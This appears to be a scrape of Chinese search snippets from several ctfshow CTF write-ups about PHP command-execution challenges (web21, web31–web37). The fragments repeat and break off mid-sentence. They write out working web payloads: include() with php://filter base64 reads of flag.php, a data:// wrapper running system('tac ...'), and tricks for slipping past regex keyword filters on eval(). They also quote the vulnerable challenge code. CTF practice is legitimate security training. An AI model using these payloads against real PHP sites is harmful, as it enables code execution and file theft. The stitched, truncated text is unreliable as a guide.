web32:eval() 利用与正则绕过。 web33:eval() 利用与正则绕过,PHP 伪协议。 web34:eval() 利用与正则绕过,PHP 伪协议。 web35:eval() 利用与正则绕过,PHP 伪协议。 web36:eval() 利用与正则绕过,PHP 伪协议。 web37:include() 利用与正则绕过,PHP 伪协议。 web38:include() 利用与正则绕过,PHP 伪协...
在web31的基础上额外过滤了括号 include可以不使用括号直接使用 payload:?c=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php 注:其中?>用来代替分号
首先查看文件: 然后查看flag: web31: 同上,利用POST传参,绕过过滤 web32: 过滤掉了system和`,我们没办法直接用命令执行 过滤掉了echo没办法直接输出 过滤掉了;只能替换成?> 过滤掉了(没办法直接套娃 思考文件方面的做法: 之后base64解码即可 web33: 方法1同web32 方法2:用require代替inlcude web34: 方法1,2...
4-命令执行-web32-关键词(echo)绕过题目error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }...
ctfshow web入门 命令执行 web32 <?php/*# -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com*/error_reporting(0);if(isset($_...
多过滤' : ',include已经将语句闭合,不影响后面伪协议代码,payload同Web32 Web35: 多过滤' < ',' = ',payload同Web32 Web36: 多过滤' / ',数字,没过滤字符,将Web32的payload1改成a继续用 Web37: 题目使用include包含输入,使用php的伪协议data进行文件读取 ...
CTFshow-Web入门模块-爆破 by 故人叹、 web21 考察点:burpsuite使用、自定义迭代器使用 题目提供了字典,要求登录并提示了爆破,使用burpsuite抓包并操作: (1)用户名一般为admin,密码随意输,抓包并发送给爆破模块。 可以看到Basic后有一段base64编码,解码得到用户名:密码的格式,证明我们之后的payload在此处,并且格式要与...
4|0web32 在前面的基础上,过滤了括号,但没过滤双引号 ?c=include$_GET["a"]?>&a=php://filter/read=convert.base64-encode/resource=flag.php 5|0web33 过滤了引号 ?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php ...
Web35: 多过滤' < ',' = ',payload同Web32Web36: 多过滤' / ',数字,没过滤字符,将Web32的payload1改成a继续用Web37: 题目使用include包含输入,使用php的伪协议data进行文件读取用法:data://text/plain, data://text/plain;base64, payload:?c=data://text/plain,<?php system('tac fla...
合集- ctfshow 菜狗杯 web(1) 1.ctfshow-菜狗杯-web2024-05-14 收起 菜狗杯一言既出打开题目就是一个朴实无华的php代码我们分析一下:需要传入一个num的参数,使num==114514,后面经过intval转化后要num==1919810,否则直接结束进程这下就有点难办了,但其实我们只要其实闭合一下这个assert函数,不让这个结束的条件...